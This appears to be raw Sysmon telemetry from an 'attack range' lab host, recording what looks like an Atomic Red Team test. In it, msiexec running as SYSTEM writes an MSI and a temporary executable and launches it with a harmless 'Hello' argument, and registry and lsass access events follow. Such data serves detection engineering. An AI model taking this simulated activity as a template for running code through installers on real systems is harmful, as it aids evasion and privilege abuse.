15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695488Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695487Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002695486Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.522{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5146.msiMD5=3B5B5DC790399E957405F1ACF5E5C9CE,SHA256=656E2F62121A69A972DBFFBCC92E4440351467B0650148BE14226899DAA1B698falsetrue 23542300x80000000000000002695480Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.506{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI5685.tmpMD5=712BD86DBDB06FD26F245F24BEE2F999,SHA256=DA97C4B389579841D5627E0C06FF7B8452121DF34BA5453819F74F071157CC9Etruetrue 10341000x80000000000000002695340Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.444{7CF983DC-981D-62AC-1A6B-000000006202}48403084C:\Windows\system32\msiexec.exe{7CF983DC-9812-62AC-116B-000000006202}4924C:\Windows\Installer\MSI5685.tmp0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ec6fd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002695339Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.451{7CF983DC-9826-62AC-376B-000000006202}4924C:\Windows\Installer\MSI5685.tmp0.0.0.0 --PrintArgs.exe"C:\Windows\Installer\MSI5685.tmp" "Hello, Atomic Red Team from an EXE!"C:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=712BD86DBDB06FD26F245F24BEE2F999,SHA256=DA97C4B389579841D5627E0C06FF7B8452121DF34BA5453819F74F071157CC9E{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 10341000x80000000000000002695315Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.444{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002695313Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.444{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002695312Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.444{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI5685.tmp2022-06-17 15:05:10.444NT AUTHORITY\SYSTEM 13241300x80000000000000002695285Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002695284Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002695283Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002695282Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002695281Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002695280Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002695279Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}48403860C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002695278Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002695277Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002695276Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002695275Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5146.msi2022-06-13 14:04:24.0002022-06-17 15:05:10.412NT AUTHORITY\SYSTEM 10341000x80000000000000002695274Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002695273Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002695272Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5146.msi2022-06-17 15:05:10.412NT AUTHORITY\SYSTEM 23542300x80000000000000002695271Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5146.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002695270Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.412{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5146.msi2022-06-17 15:05:10.412NT AUTHORITY\SYSTEM 10341000x80000000000000002695268Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695267Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695266Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695265Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695264Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695263Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695262Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695261Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695260Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695259Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002695258Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.397{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-9826-62AC-366B-000000006202}4024c:\windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C: